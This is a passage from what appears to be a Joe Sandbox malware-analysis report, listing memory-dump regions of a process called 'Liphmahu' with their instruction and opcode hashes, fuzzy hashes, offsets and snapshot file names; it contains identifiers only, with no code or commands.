                                                                                  • Instruction ID: a52b4bb836c6f95a316ca7ba77e22e29ed03ae1d3e70761f6be73c5771a4b570
                                                                                  • Opcode Fuzzy Hash: e8db0ce3ca9048a7a23d52b6748e3ce0a96b7c7c834408df6afddb10eb1a7d86
                                                                                  • Instruction Fuzzy Hash: DC21C5323052004FC7249B79E944A66BBE5EBC0361B19857BE54ED7251DB31EC42D791
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c077ba18be2d250fe7ef86dd8aa47b7da9b3ced8b30fdca17165fc7217f7f944
                                                                                  • Instruction ID: ad40e1ff94b96da35195595b17af5d288ffded444a2279a2ec181857d3f3f557
                                                                                  • Opcode Fuzzy Hash: c077ba18be2d250fe7ef86dd8aa47b7da9b3ced8b30fdca17165fc7217f7f944
                                                                                  • Instruction Fuzzy Hash: A731E5B4D45208DFDB54CFA9C944AAEBBF7FB49301F1080AAE459AB361D7349A41CF50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 974756772499cf902f8603d2ca09bdc2e19d11504162972f9a57bf4fc95c1c3b
                                                                                  • Instruction ID: b52860cf0fbea13ccae84ea0ce964f298669d86587b3f9061ba8865a88a8be57
                                                                                  • Opcode Fuzzy Hash: 974756772499cf902f8603d2ca09bdc2e19d11504162972f9a57bf4fc95c1c3b
                                                                                  • Instruction Fuzzy Hash: 0F318B34701705CFC726AF68D45896EBBB6FF85355B10856EE8028B3A1CF31E84ACB50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d6bdaf214b52bf2e49a4eaee5fa5e0f5c787909c301899d2eaf34f67348e4b1b
                                                                                  • Instruction ID: c4eaefbb5aa5951c7072be07158528788808d3119c9a4ad78a4f83d8cef0cade
                                                                                  • Opcode Fuzzy Hash: d6bdaf214b52bf2e49a4eaee5fa5e0f5c787909c301899d2eaf34f67348e4b1b
                                                                                  • Instruction Fuzzy Hash: 28312B75E012189FCB05DFA9D9506EEBBB6FF88310F10806AE455BB364DB359942CF90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c1df721af1f3e4fda5273cb523b825db18241d39373da807aa962176b801f9bb
                                                                                  • Instruction ID: 93c25e9004138b54ecb6b030209462a3e39cd07e38c3d651bae91c2c98de6fac
                                                                                  • Opcode Fuzzy Hash: c1df721af1f3e4fda5273cb523b825db18241d39373da807aa962176b801f9bb
                                                                                  • Instruction Fuzzy Hash: 3D312634704216CFD714DF65D994D2A77B6BF84646B1094AAD906CB3B6EB31EC01CF60
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d1d9d614c7b2254f2f6d9980bbdccd996a6c335d351a68e79cf6e80a835edc7d
                                                                                  • Instruction ID: 43ca62d0a29b142c01ee26e2b9ad7985d3182dcda1d1ca2b2063b23bc52bde08
                                                                                  • Opcode Fuzzy Hash: d1d9d614c7b2254f2f6d9980bbdccd996a6c335d351a68e79cf6e80a835edc7d
                                                                                  • Instruction Fuzzy Hash: C5219D32F002158B8B109EE9E8844BEB7BAFB842617204577E817D7741EB30D906C760
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2191934058.00000000008BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008BD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_8bd000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9dcae9e9ea17321e475df1db92b3a9ded3b9788b33f142fb5c268aa3b04fdb2a
                                                                                  • Instruction ID: df1157f8ebd44236f6e5e2ffb132aa82d21b17c2ff5dcaacb2710d1d674e8214
                                                                                  • Opcode Fuzzy Hash: 9dcae9e9ea17321e475df1db92b3a9ded3b9788b33f142fb5c268aa3b04fdb2a
                                                                                  • Instruction Fuzzy Hash: 3A213371500304EFDB15DF04D9C0B67BF65FB98328F20C169E90A8A356D336E846CBA2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 413031999c65adf4a2bd9f3387b259e1a3b0e122899548aee8b3664accbec2ad
                                                                                  • Instruction ID: 31269d469ffe119f5239006e99621dcb8213d83706abe7aa21c58433ef6fcf60
                                                                                  • Opcode Fuzzy Hash: 413031999c65adf4a2bd9f3387b259e1a3b0e122899548aee8b3664accbec2ad
                                                                                  • Instruction Fuzzy Hash: F3215771E00219DFDB40DFB8C904BAEBBF5AF45381F108066D55ADB290E734CA52CB91
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2192013683.00000000008CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008CD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_8cd000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f5b3206d994b791beecec55fae3f790f9e7024692577a42431b89f07a724d30b
                                                                                  • Instruction ID: 24bdd622baf5b98914d78a33e4d39e89ae51b18026bf16ff610d7b63b782309d
                                                                                  • Opcode Fuzzy Hash: f5b3206d994b791beecec55fae3f790f9e7024692577a42431b89f07a724d30b
                                                                                  • Instruction Fuzzy Hash: 7021CFB1504344DFDB05EF14DA84F2AFBB5FB84314F28857EE8098B256C336D846CAA2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 204449165c7b5c143de2afec219689ef57d0ddcddbf016dc8f70e2a8d9d3ab15
                                                                                  • Instruction ID: 2f42c6544f342a0d69ad569b328e5b112837a8e8d046e0b1196b859c6eddb019
                                                                                  • Opcode Fuzzy Hash: 204449165c7b5c143de2afec219689ef57d0ddcddbf016dc8f70e2a8d9d3ab15
                                                                                  • Instruction Fuzzy Hash: E1212F35A10215AFCF159FA8D454ADEBBB6FB8C320F14812AE415A7394CB719885CF91
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a673c67a0e281a8a37ad0e05ab42ad9833d823ad3454b393d5502f2ff004f218
                                                                                  • Instruction ID: 476a863c8028ddcd0d15812c9397f8303fe05a241a34f1c421c1b4d9dcd643b9
                                                                                  • Opcode Fuzzy Hash: a673c67a0e281a8a37ad0e05ab42ad9833d823ad3454b393d5502f2ff004f218
                                                                                  • Instruction Fuzzy Hash: 882192346103069FC704EB6CD8557AEBBF6EB84300F40853AE01AD7795DE71990A8BA1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2192013683.00000000008CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008CD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_8cd000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a30f8f36898b631c6ec3de07c4b45761c494f3e2985b08e9d7ef22da7def3686
                                                                                  • Instruction ID: 8fa9ef9efa9f8affba76d08a0f752bf0ab21bb86329e389559415bd684ce3e9d
                                                                                  • Opcode Fuzzy Hash: a30f8f36898b631c6ec3de07c4b45761c494f3e2985b08e9d7ef22da7def3686
                                                                                  • Instruction Fuzzy Hash: DB21BD71604704DFCB14EF18D984F26BBA5FB84318F20C57DD84A8B296C33AD846CA61
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f87b42dd9bafe5dc9e162b7080b8d0f8fff87f917a53a8156b8a51849b67315a
                                                                                  • Instruction ID: 8743aa74674db7d57106345f8b5169a9e69bae617c458cb2c82b51bde8ddea8f
                                                                                  • Opcode Fuzzy Hash: f87b42dd9bafe5dc9e162b7080b8d0f8fff87f917a53a8156b8a51849b67315a
                                                                                  • Instruction Fuzzy Hash: 9421D771A002098FDB05DF98DA45ADDB7F2FB48300F1041A5E405AB3A1CB759D85CBA0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 726103ebe7805c8da40e634761b44638006d3d0743ab56c1c200aaa6d40975e1
                                                                                  • Instruction ID: f6051eefff0fa8d0bb48735a0dfcb286904a11453f03d6a63c4f9e50f28aca30
                                                                                  • Opcode Fuzzy Hash: 726103ebe7805c8da40e634761b44638006d3d0743ab56c1c200aaa6d40975e1
                                                                                  • Instruction Fuzzy Hash: E5F0E7AB40FBD43FDB0362784D256DA2F7B9A3715070E41D3F082CA0A7D2195A5AC37A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: cc7c4e0b51fc2b546496097c4c1229d538cc501acef1a99f9b14e57742187714
                                                                                  • Instruction ID: 95ac1195456ece8559304bf7dd77f19661fd024a986ef27d0d70a7fdc3ae42ae
                                                                                  • Opcode Fuzzy Hash: cc7c4e0b51fc2b546496097c4c1229d538cc501acef1a99f9b14e57742187714
                                                                                  • Instruction Fuzzy Hash: B031E770A45108CFDB54EFA8D8447ADBBF2FB59701F5080AAE509AB355DB309D85CF11
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b8b4bc43e22bc4d4b12d1d073b18452f4e9d83d3ded95857cd31b8c9f3db473a
                                                                                  • Instruction ID: 22634b10da546a766db1b60d82c78216878cbad9c0214452d71878bcab25e2c4
                                                                                  • Opcode Fuzzy Hash: b8b4bc43e22bc4d4b12d1d073b18452f4e9d83d3ded95857cd31b8c9f3db473a
                                                                                  • Instruction Fuzzy Hash: B321F3B4E04209DFCF04DFA9D4846AEBBB2FB88301F24C16AD415A7254E7349A82CF91
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2216506456.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_6c60000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 82b04ec8cd9384b4a16c7a280d5f96d27be20ad5969916f8aae6a58200149cbb
                                                                                  • Instruction ID: c1d8250bddbe5138898e15b033ffdde730b9d93371933b8716262409c6ebd165
                                                                                  • Opcode Fuzzy Hash: 82b04ec8cd9384b4a16c7a280d5f96d27be20ad5969916f8aae6a58200149cbb
                                                                                  • Instruction Fuzzy Hash: 5E21CD74E0020ACFCB44DFA8C544AEEBBF1EB48211F10846AE419BB354DB35AE41CFA1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2191934058.00000000008BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008BD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_8bd000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                  • Instruction ID: f53ca7caa980c3ba729f16d6c168103599cc0d21c45953d2e9589b9a543787b9
                                                                                  • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                  • Instruction Fuzzy Hash: 8A11E176504340DFCB12CF04D5C4B56BF71FB94328F24C1A9D9094B256C336D85ACBA2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2216506456.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_6c60000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 00283bf16a2c9f88cb9332180e2046956c87bded0c6c24d455a745520d3b5282
                                                                                  • Instruction ID: c6ea1f47fa6a001729ecfd457ca26f53729e0d8035bf7573b8efc6b7f5874277
                                                                                  • Opcode Fuzzy Hash: 00283bf16a2c9f88cb9332180e2046956c87bded0c6c24d455a745520d3b5282
                                                                                  • Instruction Fuzzy Hash: B0318078E142289FDB69DF28C984AD9BBF2FB49305F1081D5EA08A7355D770AE80CF50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3ce017222291c93f2bb2916bcae6b6d44572d0a6d4a065b2cd8ed043cf1956c0
                                                                                  • Instruction ID: ff851c3228744446a4bd56887180f4974c1293e6eb9c6f1124ca97f14a42bc46
                                                                                  • Opcode Fuzzy Hash: 3ce017222291c93f2bb2916bcae6b6d44572d0a6d4a065b2cd8ed043cf1956c0
                                                                                  • Instruction Fuzzy Hash: 78116A7AB10301AFCB25CE6898457AABBB6BB88200F14402BF455D7380EB31C8068BA1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0cf565df16ba10c425ff2567bfe1f9ea2d6e8efa57b887f6c6e3a79c637c6c2c
                                                                                  • Instruction ID: ac5293b0812c93a5996ae0deebc11b89cdd43c734a6fae13fe59c4f20eff06ff
                                                                                  • Opcode Fuzzy Hash: 0cf565df16ba10c425ff2567bfe1f9ea2d6e8efa57b887f6c6e3a79c637c6c2c
                                                                                  • Instruction Fuzzy Hash: 99214978A42659AFCB04CFA8D594EADBBB6FF49300F244059F902EB365CB34AD41CB51
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 40d91fd2b82543ec7e24d6f8222247ffb514b011dad0d47a96f7995b96c62002
                                                                                  • Instruction ID: fc975a6ffc8d1ada550f52b89e4ec137101d1710e6ba22cf12288f1f9187b092
                                                                                  • Opcode Fuzzy Hash: 40d91fd2b82543ec7e24d6f8222247ffb514b011dad0d47a96f7995b96c62002
                                                                                  • Instruction Fuzzy Hash: 34114C35B003059FCB619A6898557AABBFABB88710F14402AF945D7380EA71D9428BA1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2fee15f9d065bdbb9c1fbde4b4832020927ebaecb4183b03c936807b48465195
                                                                                  • Instruction ID: 2923fcb2b3b61b0def211f6b48eb36cf070539b1c5a8d85fedc3eeb256f48f4d
                                                                                  • Opcode Fuzzy Hash: 2fee15f9d065bdbb9c1fbde4b4832020927ebaecb4183b03c936807b48465195
                                                                                  • Instruction Fuzzy Hash: B3211570A84608DFDB14EFA8D8447ADBBF2FB59300F5080AAD05AAB254DB309989CF01
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2192013683.00000000008CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008CD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_8cd000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8904e6e2034f6e8b723f427b0fac37b038faba2da46a35eb3e2bfe2bad4ef527
                                                                                  • Instruction ID: 2558b47a9ec0004c35c7c059e93920497b5cc48d2b0c460cbc7761681d301550
                                                                                  • Opcode Fuzzy Hash: 8904e6e2034f6e8b723f427b0fac37b038faba2da46a35eb3e2bfe2bad4ef527
                                                                                  • Instruction Fuzzy Hash: FC11AC76504280CFCB02DF14D9C4B16FF71FB84314F28C2AAD8094B656C33AD81ACBA2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6058510b8f24281ae496d93725a2bf75e43caa15787242774b8c00ad09bb0473
                                                                                  • Instruction ID: e55a97c932a1f864ee9d211d719738d2d8c236dcec7ff059b61be584deeb84fd
                                                                                  • Opcode Fuzzy Hash: 6058510b8f24281ae496d93725a2bf75e43caa15787242774b8c00ad09bb0473
                                                                                  • Instruction Fuzzy Hash: ED01F5326082595FD754DB99E040AEBBFE8FB45221F2880ABE484C72A0D631D990CB50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2192013683.00000000008CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008CD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_8cd000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                  • Instruction ID: 1bb1900ab74dc51c65a51ef3627346060adc52d8c2ac09c88c92919294a60d6b
                                                                                  • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                  • Instruction Fuzzy Hash: E911BB75504780DFCB11DF18D5C4B16BBB2FB84314F24C6AED8498B656C33AD80ACBA2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2896d3ed874c7313abefb5b493ab8ea2eb1c5aabf47d021a6450dc2cbe6df1f4
                                                                                  • Instruction ID: bc5d04adc18e71f815ba77ee36a248cae527a98c60102e6cdc039f44f1abde29
                                                                                  • Opcode Fuzzy Hash: 2896d3ed874c7313abefb5b493ab8ea2eb1c5aabf47d021a6450dc2cbe6df1f4
                                                                                  • Instruction Fuzzy Hash: 8A115271E0010A9FCB04DF99C8815AFFBBAFF88310B14853AD519A7355EB31AD4A8BD1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0e87adf8db4810dba2dc1119d69d3d2dde0815cfee509d93660f647aa535b059
                                                                                  • Instruction ID: 5185677399e860728c81f8e26c1d2182990988befcf9db0e2d0184a7dc4bd11a
                                                                                  • Opcode Fuzzy Hash: 0e87adf8db4810dba2dc1119d69d3d2dde0815cfee509d93660f647aa535b059
                                                                                  • Instruction Fuzzy Hash: E721B2359052189FEB54EFA8D844B9D7BF2FB49315F5081AAE409BB344DB349E84CF10
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1c811fb917a37b22ef0a85a3f4adb354e24cf27fa10c7c1494b426ccfbb2fd13
                                                                                  • Instruction ID: 4c8d43bf2eb34a23d27751f860cd2d44295c88e7dceeb718201466e8ad2f0a85
                                                                                  • Opcode Fuzzy Hash: 1c811fb917a37b22ef0a85a3f4adb354e24cf27fa10c7c1494b426ccfbb2fd13
                                                                                  • Instruction Fuzzy Hash: C9014836350315AFDB108E59DC95F9FB7A9FB89721F108067FA15CB390CA71D8158B50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7f7a1ee8ac73f1db1dbd56024532d59a3a86408579e26201613384044ecdaf16
                                                                                  • Instruction ID: 7b35e62f16d9fc897152d0851eedfff3acfdc816d311742e623c0a93772126e6
                                                                                  • Opcode Fuzzy Hash: 7f7a1ee8ac73f1db1dbd56024532d59a3a86408579e26201613384044ecdaf16
                                                                                  • Instruction Fuzzy Hash: 28012436205205AFC701EB18D4549DD7F66EF86324B04809BF4088F321DB72AD47CBD0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0fb7d6af9e1e593feacb47dc21d0655511dbc226dd9d4cfa5bf73d4c075d1452
                                                                                  • Instruction ID: c2cbc920374554d96879143fd1fdca8edbe5d451ff992368b64d7135657bdc09
                                                                                  • Opcode Fuzzy Hash: 0fb7d6af9e1e593feacb47dc21d0655511dbc226dd9d4cfa5bf73d4c075d1452
                                                                                  • Instruction Fuzzy Hash: 1911C976A001189BCB15CF99D8809DEB7F9EF48350B158167E905E7324EA31E906CB90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7aea53b2b0e3c266f085a97953c8b3520f0b64594279198ed2bf8198ec32c9b5
                                                                                  • Instruction ID: 0a200b439e92943c3c68aec13014b6aca2966efdc39ce989186bdd42b65462a7
                                                                                  • Opcode Fuzzy Hash: 7aea53b2b0e3c266f085a97953c8b3520f0b64594279198ed2bf8198ec32c9b5
                                                                                  • Instruction Fuzzy Hash: 5A019E313003049FC728AB34E854B2A77A3EBC9324F14856AD9568B7A4CB72FC439B90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2216506456.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_6c60000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d5de810719a1a649d1cb7f2ceecb012f9688b2e6d2383c4baeb26ed64056194a
                                                                                  • Instruction ID: d5de7a1170eba8a02439814b579f134f368e4c6dad52e79e492074da47b06ddd
                                                                                  • Opcode Fuzzy Hash: d5de810719a1a649d1cb7f2ceecb012f9688b2e6d2383c4baeb26ed64056194a
                                                                                  • Instruction Fuzzy Hash: 3811B7B0E002199FCB44DFA9C9456BFBBF5FF88300F20846A9418E7354EA359A418F91
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2191934058.00000000008BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008BD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_8bd000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d69b1030f1136c7a95d1a05d3fb38f231231cc8fa3c34b98d3af70f944665227
                                                                                  • Instruction ID: c231a7b2c0f1f224ea92865d56b485e4b8797c610d09532fd84544669b079c49
                                                                                  • Opcode Fuzzy Hash: d69b1030f1136c7a95d1a05d3fb38f231231cc8fa3c34b98d3af70f944665227
                                                                                  • Instruction Fuzzy Hash: 1501A771009744BAE7104A15D9C4BE7BFD8FF41324F18C569ED098A386DA79D840C6B5
                                                                                  Memory Dump Source
